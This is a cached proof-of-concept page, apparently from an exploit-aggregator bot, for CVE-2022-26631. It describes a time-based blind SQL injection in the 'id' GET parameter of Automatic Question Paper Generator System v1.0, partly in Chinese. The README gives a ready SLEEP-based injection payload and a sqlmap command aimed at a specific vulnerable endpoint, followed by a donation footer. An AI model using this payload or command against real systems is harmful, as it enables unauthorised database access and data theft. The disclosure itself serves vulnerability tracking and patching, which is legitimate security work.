CVE-2022-26631 PoC — ResearchGate Automatic Question Paper Generator System SQL注入漏洞

Source

https://github.com/5l1v3r1/CVE-2022-26631

Associated Vulnerability

Title:ResearchGate Automatic Question Paper Generator System SQL注入漏洞 (CVE-2022-26631)
Description:ResearchGate Automatic Question Paper Generator System是德国ResearchGate公司的一个自动试卷生成系统。 ResearchGate Automatic Question Paper Generator System v1.0版本存在SQL注入漏洞，该漏洞源于GET请求中的id参数可能导致基于时间的SQL盲注漏洞。

Description

CVE-2022-26631 - Automatic Question Paper Generator v1.0 SQLi

Readme

# CVE-2022-26631
CVE-2022-26631 - Automatic Question Paper Generator v1.0 SQLi

# Description
The `id` GET parameter from Automatic Question Paper Generator System v1.0 appears to be vulnerable to Time-Based Blind SQL injection attacks.

# Payload
An attacker could execute the following SQLi payload in order to gain access to the MySQL database.

`id=1' AND (SELECT 2599 FROM (SELECT(SLEEP(5)))eRGe) AND 'YFLg'='YFLg`

For simplicity, an attacker could automate the exploitation use the tool 'sqlmap' with the following command.

`sqlmap -u 'http://target-url/aqpg/users/question_papers/manage_generate_form.php?id=1' --batch`

File Snapshot


 [4.0K]  /data/pocs/7863b4d0832c06d4ce1abbc34e857b2a41bdfbdc
└── [ 630]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!